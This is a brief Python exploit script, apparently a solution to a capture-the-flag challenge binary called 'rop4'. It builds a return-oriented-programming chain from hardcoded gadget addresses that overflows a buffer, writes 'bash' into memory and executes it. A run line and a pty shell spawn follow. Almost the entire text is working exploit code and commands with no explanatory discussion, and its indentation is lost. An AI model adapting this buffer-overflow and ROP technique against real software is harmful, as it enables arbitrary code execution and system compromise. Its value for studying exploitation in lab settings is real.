#! /usr/bin/python
import sys
import struct
if sys.byteorder == 'little':
Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
Q = lambda x: struct.pack(">I", x)
# 0x0806d1aa: movl %eax, (%ecx) ; ret ;
g0 = Q(0x0806d1aa)
# 0x080e3c2a: popl %ecx ; ret ;
g1 = Q(0x080e3c2a)
# 0x080c28c6: popl %eax ; ret ;
g2 = Q(0x080c28c6)
payload = "\x41"*(0x80 + 12) # junk
payload += g1 # popl %ecx; ret;
payload += Q(0x080f112c) # exec_string addr
payload += g2 # popl %eax; ret;
payload += struct.pack(">I", int(("bash").encode('hex'), 0x10)) # 'bash'
payload += g0 # movl %eax, (%ecx)
payload += Q(0x08048ed0) # exec_the_string addr
payload += Q(0xdeadbeef) # bogus return addr
open("/tmp/pl", "w").write(payload)run the python script, and finally do the magic trick...
host$ python pwn.py && (cat /tmp/pl 2> /dev/null; cat -) | ./rop4
python -c 'import pty;pty.spawn("/bin/sh")'
$ echo "pwned!!"